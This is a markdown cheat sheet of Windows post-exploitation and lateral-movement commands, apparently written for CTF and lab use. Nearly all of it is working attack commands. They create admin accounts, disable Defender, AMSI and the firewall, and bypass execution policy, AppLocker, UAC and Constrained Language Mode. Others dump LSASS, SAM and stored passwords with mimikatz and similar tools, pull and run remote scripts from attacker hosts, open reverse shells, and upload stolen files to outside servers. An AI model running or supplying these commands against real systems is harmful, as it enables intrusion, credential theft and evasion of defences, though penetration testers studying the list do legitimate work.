# Lateral Movement ## 01. Common commands ### 01.1 OS Enumerations ```python ## ------------------| Get Basic details systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" whoami /all ## ------------------| Get environment paths ##[Powershell] Get-ChildItem Env: | ft Key,Value dir env: ## ------------------| Get .Net Version (cmd/ps) reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" ## ------------------| Get System Architecher 32 or 64 ##[Powershell] $env:PROCESSOR_ARCHITECTURE [Environment]::Is64BitProcess [Environment]::Is64BitOperatingSystem ##[cmd] set processor ## ------------------| Extract os patchs and updates wmic qfe ## ------------------| List all installed software with patches ( wmic product get name, version, vendor ## ------------------| List all disk mountvol wmic logicaldisk get caption,description,providername ## ------------------| List firewall state and current configuration netsh advfirewall firewall dump netsh firewall show state netsh firewall show config netsh advfirewall firewall show rule name=all ``` ### 01.2 User Enumerations ```bash ## ------------------| Get current username echo %USERNAME% || whoami $env:username ## ------------------| List user info net user ## ------------------| Get userprofile (home) directory write-host $env:USERPROFILE ## ------------------| List user privilege whoami /priv whoami /groups ## ------------------| List all users net user whoami /all Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name ## ------------------| List logon requirements net accounts ## ------------------| List all local groups net localgroup Get-LocalGroup | ft Name ## ------------------| Get details about a group net localgroup administrators Get-LocalGroupMember Administrators | ft Name, PrincipalSource Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource ## ------------------| Get Domain Controllers nltest /DCLIST:DomainName nltest /DCNAME:DomainName nltest /DSGETDC:DomainName ## ------------------| Get Domain Users net view /domain net view /domain:DomainName ``` * Create user ```bash ## ------------------| Local account ## Crearte local user net user /add harith Password@123 ## Add to the admin group net localgroup administrators harith /add ## Add to the Remote Desktop Users net localgroup "Remote Desktop Users" harith /add ## ------------------| Domain account ## This commands can be used only on a Windows Domain Controller net user h4rithd Passw0rD$ /add /domain # Check members on net group "Exchange Windows Permissions" # Add members to net group "Exchange Windows Permissions" /add h4rithd ``` * Login as another user ```bash ## ------------------| If you have RDP runAs /user:h4rithd cmd.exe powershell.exe Start-Process cmd.exe -Verb runAs /user:h4rithd ## ------------------| Create Creds Object $user = "USERNAME" # It's better to use with $user = "/" $pass = "PASSWORD" $secStringPass = ConvertTo-SecureString $pass -AsPlainText -Force $Creds = New-Object System.Management.Automation.PSCredential($user,$secStringPass) ## ------------------| Use the Creds Object for activities Start-Process -Credential $Creds -FilePath Powershell -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.22/rev.ps1')" ### Following commads are not working need to try again!!! Invoke-Command -Credential $Creds -ComputerName -ScriptBlock { whoami } Enter-PSSession -Credential $Creds -ComputerName ## Double hop access (Authentication CredSSP) Invoke-Command -ComputerName helpline -Authentication CredSSP -credential $cred -ScriptBlock { whoami } ``` * Change password ```bash $pass = ConvertTo-SecureString 'Pas$word!' -asPlainText -Force Set-DomainUserPassword Herman -AccountPassword $pass -Verbose ``` * Stored Credentials | Saved Creds ```bash cmdkey /list runas /savecred /user: C:\\shell.exe ``` ### 01.3 Network Enumeration ```bash ## ------------------| List all listening ports netstat -ano | findstr /i listen netstat -anop tcp ## ------------------| List all network interfaces, IP, and DNS. ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft ## ------------------| List current routing table route print Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex ## ------------------| List the ARP table arp -A Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State ## ------------------| List all network shares net share powershell Find-DomainShare -ComputerDomain domain.local ## ------------------| SNMP Configuration reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` * Turn on RDP ```bash ## ------------------| Enable the RDP Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 ## ------------------| Enable authentication via RDP Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1 ## ------------------| Enable RDP through the Windows Firewall Enable-NetFirewallRule -DisplayGroup "Remote Desktop" ## ------------------| Using MSF use post/windows/manage/enable_rdp set Username h4rithd set Password Password123! set SESSION 1 info run ## ------------------| Login to the RDP rdesktop -g 1920x1080 ``` * Ping sweeper ```bash ## ------------------| Genaral 1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_} | Select-String ttl ## ------------------| Parallel ping sweeper workflow ParallelSweep { foreach -parallel -throttlelimit 4 ($i in 1..255) {ping -n 1 -w 100 10.0.0.$i}}; ParallelSweep | Select-String ttl ## ------------------| Multi-subnet ping sweeper with OS Detection 0..10 | % { $a = $_; 1..255 | % { $b = $_; ping -n 1 -w 10 "10.0.$a.$b" | select-string TTL | % { if ($_ -match "ms") { $ttl = $_.line.split('=')[2] -as [int]; if ($ttl -lt 65) { $os = "Linux" } ElseIf ($ttl -gt 64 -And $ttl -lt 129) { $os = "Windows" } else { $os = "Cisco"}; write-host "10.0.$a.$b OS: $os"; echo "10.0.$a.$b" >> scan_results.txt }}} } ``` * Export DNS Zones ```bash Get-DNSServerZone Export-DnsServerZone -Name localnet.domain -FileName dns-export.txt ## File was exported to C:\Windows\system32\dns\dns-export.txt ``` * Responder \[[Inveigh](https://github.com/Kevin-Robertson/Inveigh)] ```bash wget https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1 IEX (New-Object Net.WebClient).DownloadString('http:///Inveigh.ps1') Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y ``` ### 01.4 Process / Service Enumeration ```bash ## ------------------| List all Process Get-Process -name firefox tasklist /v | findstr smss ps | findstr smss ## ------------------| List all services Get-Service sc query state=all get-wmiobject win32_service ## If all above commands are failed; try following Set-Location 'HKLM:\SYSTEM\CurrentControlSet\Services' Get-ChildItem . | select name Get-ChildItem . | where-object { $_.Name -like '*EnterServiceNameHere*' ## ------------------| Processes are running as "system" tasklist /v /fi "username eq system" ## ------------------| Kill process taskkill /f /im:filename.exe ## ------------------| Scheduled Tasks ### List all tasks schtasks /query /fo LIST /v ### Run task schtasks /RUN /RN "\NameHere" ## ------------------| Start Service (Stop,Restart) ## Get Display Name using above methord Stop-Service "Ubiquiti UniFi Video" Start-Service "Ubiquiti UniFi Video" net stop EnterServiceNameHere net start EnterServiceNameHere sc.exe stop EnterServiceNameHere sc.exe start EnterServiceNameHere ## ------------------| Examine basic service properties Get-Service nscp | fl * ## ------------------| List loaded assemblies [appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname ## ------------------| List only running services Get-Service | where {$_.Status -eq "Running"} wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V "''" ``` * Modifiable Services ```bash ## ------------------| Modify the UsoSvc service bin path sc.exe config UsoSvc binpath="cmd.exe /c powershell -EncodedCommand SQBFAFgAKABOA.....ApAA==" ## ------------------| Restart the UsoSvc service sc.exe stop UsoSvc sc.exe start UsoSvc ``` * Dump process ```bash ## ------------------| Dump Process using rundll32 get-process rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump full ## Dumping Lsass Without Mimikatz] rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\Users\Public\Documents\lsass.dmp ## ------------------| Dump Process using ProcDump ./procdump.exe -accepteula -ma ``` * List installed programs ```bash Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name ``` ### 01.5 File Enumeration ```bash ## ------------------| List all file include hidden ones dir -force dir /b/s C:\ flag.txt where /R C:\ flag.txt gci -r . user.txt gci -recurse | select FullName gci -recurse C:\Users\ user.txt Get-ChildItem -Path C:\Users -Recurse -Include root.txt,user.txt | select Fullname ## ------------------| Get file stream data cmd /c dir /r Get-Item -Stream * Get-Content -Stream ## ------------------| List all files only has extention gci -recurse -include *.* | select FullName ## ------------------| List all installed drivers / version driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start mode', Path Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"} ``` * Advance search ```bash ## ------------------| Search for file contents cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config findstr /spin "password" *.* ## ------------------| Search for a file with a certain filename dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C:\ user.txt where /R C:\ *.ini ## ------------------| Search for strings inside files IWR -Uri "https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Find-Strings.ps1" -OutFile "Find-Strings.ps1" .\Find-Strings.ps1 -stopAt "5" .\Find-strings.ps1 -Path "$Env:TMP" -String "pass=|passwd=|password=" .\Find-strings.ps1 -Path "$Env:USERPROFILE" -String "[^$]password=" ## ------------------| Find GPP Passwords in SYSVOL dir "C:\ProgramData\Microsoft\Group Policy\History\" findstr /S cpassword $env:logonserver\sysvol\*.xml findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe) findstr /S /I cpassword \\\sysvol\\policies\*.xml ## ------------------| Search Windows Autologin REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword /reg:64 REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" | findstr "DefaultUserName DefaultDomainName DefaultPassword" REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" ## ------------------| Search the registry for key names and passwords REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K ## ------------------| Search SNMP parameters REG QUERY "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" ## ------------------| Search Putty clear text proxy credentials REG QUERY "HKCU\Software\SimonTatham\PuTTY\Sessions" ## ------------------| Search VNC credentials REG QUERY "HKCU\Software\ORL\WinVNC3\Password" REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password REG QUERY HKLM /f password /t REG_SZ /s REG QUERY HKCU /f password /t REG_SZ /s ## ------------------| Search Insecure File Permissions (check World Writeble) ### Tool : https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk accesschk.exe /accepteula -uwcqv "Authenticated Users" * accesschk.exe /accepteula -uws "Everyone" "C:\Program Files" ## ------------------| Backup Sticky Notes ### Win 10 New (Version 1607) cd C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState ### Win 10/7/8 (Version 1511) cd C:\Users\\AppData\Roaming\Microsoft\Sticky Notes ## copy all plum.* files; then use sqlite to extrack ``` * Weak Permission ```powershell ## ------------------| File\Folder icacls "C:\Program Files (x86)\*" 2>null | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%" icacls "C:\Program Files\*" 2>null | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%" ## ------------------| Service wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """" Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program" icacls "C:\Program Files (x86)\*" 2>null | findstr "BUILTIN\Users:(I)(F)" icacls "C:\Program Files\*" 2>null | findstr "BUILTIN\Users:(I)(F)" ``` * Set / Check permissions ```bash ## ------------------| Check Get-ACL folder-or-file-name | FL * Get-ACL root.txt | FL AccessToString ## ------------------| Set Full-Control cacls root.txt /t /e /p UserName:F ## ------------------| Remove user from ACL cacls root.txt /e /r UserName #---------------- cacls Commands Help # /e Edit an ACL instead of replacing it. # /t Changes ACLs of specified files in the current directory and all subdirectories. # /p user: Replace specified user's access rights, including these valid values for permission: # |-> n - None # |-> r - Read # |-> w - Write # |-> c - Change (write) # |-> f - Full control ## ------------------| Search Insecure File Permissions (check World Writeble) Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"} ``` * Enumerate Shortcut (`.lnk`) ```bash $Wscript = New-Object -ComObject Wscript.Shell $shortcut = Get-ChildItem *.lnk $Wscript.CreateShortcut($shortcut) ``` * Compress & Extract zip file ```bash ## ------------------| Compress Compress-Archive -LiteralPath -DestinationPath .zip ## ------------------| Extract / Unzip Expand-Archive -LiteralPath .zip -DestinationPath ``` ### 01.6 Firewall / Defender #### 01.6.1 Firewall ```bash ## ------------------| List firewall state and current configuration netsh advfirewall firewall dump netsh firewall show state netsh firewall show config netsh advfirewall firewall show rule name=all ## ------------------| List firewall rules Get-NetFirewallPortFilter Get-NetFirewallRule Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow ## ------------------| Add firewall rule to open 3306 port netsh advfirewall firewall add rule name"forward_port_rule" protocol=TCP dir=in localip= localport 3306 action=alow ## ------------------| Disable Firewall on Windows 7 via cmd REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ## ------------------| Disable Firewall on Windows 7 via Powershell powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'` ## ------------------| Disable Firewall on any windows via cmd netsh firewall set opmode disable netsh Advfirewall set allprofiles state off ## ------------------| Enable (psexec) access to $ADMIN C$, IP$ (Windows Administrative Shares) REG add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f ## ------------------| List firewall's blocked ports powershell -c "$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports;$f" powershell -c "Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}}, @{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}}, @{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}}, Enabled, Profile, Direction, Action" ``` #### 01.6.2 Antivirus & Detections | Disable Defender ```bash ## ------------------| Check Defender Status Get-MpComputerStatus ## ------------------| Disable Defender cd "C:\Progra~1\Windows Defender" .\mpcmdrun.exe -RemoveDefinitions -All ## ------------------| Disable scanning all downloaded files and attachments, disable AMSI (reactive) Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus Set-MpPreference -DisableIOAVProtection $true ## ------------------| Disable AMSI (set to 0 to enable) Set-MpPreference -DisableScriptScanning 1 ## ------------------| Exclude a Folder, Extension or Process Add-MpPreference -ExclusionPath "C:\Windows\Temp" -Force Add-MpPreference -ExclusionPath "C:\Windows\Tasks" -Force Add-MpPreference -ExclusionPath "C:\Windows\Temp\h4rithd" -Force Set-MpPreference -ExclusionProcess "mimikatz.exe", "winPEAS.exe" -Force Add-MpPreference -ExclusionExtension "exe" -Force ## ------------------| Remove signatures (if Internet connection is present, they will be downloaded again): "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All ``` ### 01.7 Default Locations ```bash ## ------------------| Powershell Default locations [x86] C:\windows\syswow64\windowspowershell\v1.0\powershell.exe [x64] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [x64] C:\windows\sysnative\windowspowershell\v1.0\powershell.exe ## ------------------| Default Writeable Folders C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\drivers\color C:\Windows\Tasks C:\Windows\tracing C:\Windows\Temp C:\Users\Public ## ------------------| Passwords in unattend.xml C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml ## ------------------| Sticky Notes passwords C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite ## ------------------| Powershell History type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` * World writable directories (for AnyUsers) ```bash C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\system32\spool\drivers\color C:\Users\PublicPort Forward C:\Users\Public\Documents C:\Windows\tracing C:\Windows\Tasks C:\Windows\Temp ``` ### 01.8 Policy Bypassing * PowerShell **Execution Policy** [Bypass](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/) ```bash ## ------------------| Check/Set Execution Policy Status Set-ExecutionPolicy RemoteSigned # To set the policy to RemoteSigned. Set-ExecutionPolicy Unrestricted # To set the policy to Unrestricted. Get-ExecutionPolicy # To verify the current settings for the execution policy. Get-ExecutionPolicy -List | Format-Table -AutoSize ## ------------------| How to bypass ## 0) If you have evil-winrm access; copy rev.ps1 file to current directory. then evil-winrm -i -u -p -s $(pwd) rev.ps1 menu ## 1) Copy & Paste the Script into an Interactive PowerShell Console ## 2) Read Script from a File and Pipe to PowerShell Standard In Get-Content rev.ps1 | PowerShell.exe -noprofile - type rev.ps1 | PowerShell.exe -noprofile - ## 3) Download Script from URL and Execute with Invoke Expression powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http:///rev.ps1')" ## 3) Use the “Bypass” Execution Policy Flag PowerShell.exe -ExecutionPolicy Bypass -File .\rev.ps1 ``` * Bypass the App Locker Group Policy ```bash ## ------------------| Check App locker status Get-ApplockerPolicy -Effective -xml Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ## ------------------| Bypass | Move file to following paths C:\Windows\Temp C:\Windows\Tasks C:\windows\tracing C:\Windows\System32\FxsTmp C:\Windows\System32\com\dmp C:\Windows\SysWOW64\FxsTmp C:\Windows\SysWOW64\com\dmp C:\Windows\Registration\CRMLog C:\Windows\System32\spool\SERVERS C:\Windows\System32\spool\PRINTERS C:\Windows\System32\spool\drivers\color C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System C:\Windows\System32\Tasks_Migrated # after peforming a version upgrade of Windows 10 ## ------------------| Bypass using Powerview cp /opt/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection.ps1 . IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/Invoke-ReflectivePEInjection.ps1') $PEBytes = [IO.File]::ReadAllBytes('full\path\for\application.exe') Invoke-ReflectivePEInjection -PEBytes $PEBytes ## Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" ## ------------------| More info https://github.com/api0cradle/UltimateAppLockerByPassList ``` * PowerShell **Constrained Language Mode** [Bypass](https://github.com/padovah4ck/PSByPassCLM). ```bash ## ------------------| Verify ConstrainedLanguage mode enabled? $ExecutionContext.SessionState.LanguageMode ## ------------------| Methord 01 powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http:///rev.ps1') ## ------------------| Methord 02 ## You can run commands inside the function like this -> function test { whoami } and this equel to &{ whoami } cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1 echo -e "Invoke-PowerShellTcp -Reverse -IPAddress -Port 4545" >> rev.ps1 python3 -m http.server 80 echo -n "IEX(New-Object Net.WebClient).DownloadString('http:///rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0 &{ powershell -enc JABzAG0...Sad== } ## ------------------| Using PsBypassCLM wget https://github.com/h4rithd/PrecompiledBinaries/blob/main/PSBypassCLM/PsBypassCLM.exe ### Execute ### Place the binary in C:\Windows\Tasks\PsBypassCLM.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U C:\Windows\Tasks\PsBypassCLM.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.38 /rport=4545 /U C:\Windows\Tasks\PsBypassCLM.exe ``` * UAC Bypass ```bash REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System ## Bypasing https://github.com/hfiref0x/UACME https://docs.h4rithd.com/windows/privilageesc-windows#01.-common-tricks ``` ### 01.9 Upload / Download / Execute * Upload file. ```bash $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C://BloodHound.zip' -Encoding Byte)) Invoke-WebRequest -Uri http://10.10.14.25:443 -Method POST -Body $b64 ## Download file with netcat echo | base64 -d -w 0 > bloodhound.zip ## ------------------| The Background Intelligent Transfer Service (BITS) Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql ``` * Download file ```bash ## ------------------| Old version (support for any version) powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.63/nc.exe', 'C:\Users\Public\nc.exe')" ## ------------------| New version (alias IWR) powershell -c "Invoke-WebRequest http://10.10.14.26/nc.exe -OutFile C:\Users\Public\nc.exe" ## ------------------| Executed in memory (alias IEX) powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.25/revshell.ps1')" powershell -c "Invoke-WebRequest http://10.10.14.25/revshell.ps1 | iex" ## ------------------| Internet Explorer’s First Run error (-useBasicParsing) powershell -c "IWR -useBasicParsing http://10.10.14.26/nc.exe -o C:\Users\Public\nc.exe" ### If you have admin access you can disable Internet Explorer’s First Run customization reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2 ## ------------------| CMD ways certutil -urlcache -split -f http://10.10.14.26/nc.exe C:\Users\Public\nc.exe ## ------------------| Using Curl powershell curl http://10.10.14.11/rev.ps1 ## ------------------| The Background Intelligent Transfer Service (BITS) bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe Import-Module bitstransfer;Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe" ``` * Execute file ```bash ## ------------------| Remote IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/SharpHound.ps1') ## ------------------| Local .\rev.ps1 Import-Module .\rev.ps1 ``` ### 01.10 Encoding / Decoding * Encoded Payload ```bash ## ------------------| Encode the payload echo -n "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')" | iconv --to-code UTF-16LE | base64 -w 0 ## ------------------| Run the payload powershell -EncodedCommand SQBFAFgAKABOA.....ApAA== ``` * Encode file to base64 ```bash ## ------------------| Method I powershell -c [convert]::ToBase64String((cat C:\windows\system32\license.rtf -Encoding byte)) ## ------------------| Method II certutil -encode C:\windows\system32\license.rtf license-b64.out ## ------------------| Method III $fc = Get-Content "file name.txt" $fc $fe = [System.Text.Encoding]::UTF8.GetBytes($fc) [System.Convert]::ToBase64String($fe) ``` * Decode secure password (`SecureString`) ```bash ## ------------------| From SecureString.xml $file = Import-CliXml -Path string.xml $file.GetNetworkCredential().Password $file.GetNetworkCredential().Flag ## ------------------| $pw = gc admin-pass.xml | ConvertTo-SecureString $cred = New-Object System.Management.Automation.PSCredential("Administrator", $pw) $cred.GetNetworkCredential() | fl * ## ------------------| $user = "USERNAME" $pass = "PASSWORD" $secStringPass = ConvertTo-SecureString $pass -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential($user,$secStringPass) $cred | fl $cred.GetNetworkCredential() | fl ``` ### 01.11 Dumping Credentials * Dump `SAM` and `SYSTEM` files ```bash REG SAVE HKLM\SYSTEM SYSTEM REG SAVE HKLM\SAM SAM # Get hashes impacket-secretsdump -sam SAM -system SYSTEM local impacket-secretsdump -sam SAM -system SYSTEM -history local ``` * With [Out-Minidump.ps1](https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1) ```bash wget https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1 IEX(New-Object Net.Webclient).DownloadString('http:///Out-Minidump.ps1') Get-Process lsass | out-minidump ``` * With [Procdump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) ```bash ## ------------------| Get PID tasklist | findstr /i lsas ## ------------------| Dump to file procdump64.exe -accepteula -ma lsass.dmp procdump64.exe -accepteula -ma lsass.exe lsass.dmp ## ------------------| Extract hashes pypykatz lsa minidump lsass.dmp mimikatz.exe "sekurlsa::minidump c:\lsass.dmp" "sekurlsa::logonpasswords" ``` * With [Dumpert](https://github.com/outflanknl/Dumpert) ```bash wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Dumpert/Outflank-Dumpert.dll wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/Dumpert/Outflank-Dumpert.exe .\Outflank-Dumpert.exe rundll32.exe C:\Windows\temp\Outflank-Dumpert.dll,Dump ``` * With Avast's [AvDump](https://github.com/f1tz/Misc/tree/master/AvDump) ```bash ## ------------------| Location C:\Program Files\Avast Software\Avast\AvDump.exe ## ------------------| Download wget -O ADTool.exe https://github.com/f1tz/Misc/raw/master/AvDump/x86/AvDump.exe wget -O ADTool.exe https://github.com/f1tz/Misc/raw/master/AvDump/x64/AvDump.exe ## ------------------| Execute .\AvDump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file C:\Windows\temp\file.dmp ## ------------------| Metasploit post exploitation module post/windows/gather/avast_memory_dump ``` * With [SqlDumper](https://github.com/f1tz/Misc/tree/master/SqlDumper) ```bash ## ------------------| Download wget https://github.com/f1tz/Misc/raw/master/SqlDumper/SqlDumper_2008R2_x86.zip wget https://github.com/f1tz/Misc/raw/master/SqlDumper/SqlDumper_2008R2_x64.zip ## ------------------| Execute .\sqldumper.exe [lsass's pid] 0 0x0110 ## ------------------| Extract passwords mimikatz.exe "log" "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit ``` * LaZagne \[Firefox,Chrome] ```bash wget https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe .\laZagne.exe all ``` ### 01.12 Other * Copy file from `smb` server ```bash ## ------------------| Start SMB Server impacket-smbserver impacket-smbserver share $(pwd) -smb2support impacket-smbserver share $(pwd) -smb2support -username h4rithd -password Password123 ## ------------------| Mount share using cmd net use z: \share net use z: \\\share /USER:h4rithd Password123 ## ------------------| Mount share using powershell $pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('h4rithd', $pass) New-PSDrive -Name h4rithd -PSProvider FileSystem -Credential $cred -Root \\\share cd h4rithd: dir ## ------------------| Direct copy copy C:\Users\Public\sam \\10.10.14.26\share\sam xcopy C:\Users\Public\sam \\10.10.14.26\share\sam ``` * Start `SMB` samba server on Linux for share files. ```bash ## ------------------| From using Impacket-smbserver impacket-smbserver share . # if it gets error "Your system requires SMB2 or higher" then run below command impacket-smbserver share . -smb2support ## ------------------| From using Linux default SMBA ## Backup current settings sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak ## Create directory for smb location and grant permission mkdir -p /tmp/smb chmod 0777 /tmp/smb ## Config smba for share echo "\n\n#### --- $(hostname) was edits below lines ----\n [share] \n \ \tpath = /tmp/smb \n \ \tpublic = yes \n \ \twritable = yes \n \ \tcomment = $(hostname) shares \n \ \tprintable = no \n \ \tguest ok = yes \n \ #### --- Edit done -------" >> /etc/samba/smb.conf ## Verify configs tail 10 /etc/samba/smb.conf ## Start smb service sudo service smbd restart ## ** Please note to revert settings after done !!! cp /etc/samba/smb.conf.bak /etc/samba/smb.conf service smbd restart ``` * [RedTeam Cheatsheet](https://gist.github.com/m8r0wn/b6654989035af20a1cb777b61fbc29bf) ```bash ## ------------------| Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER] runas /user:DOMAIN\USER /noprofile powershell.exe ## ------------------| Insert reg key to enable Wdigest on newer versions of Windows reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1 ## ------------------| Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" ## ------------------| Invoke-Mimikatz: Dump credentials from memory powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" ## ------------------| Import Mimikatz Module to run further commands powershell.exe -exec Bypass -noexit -C 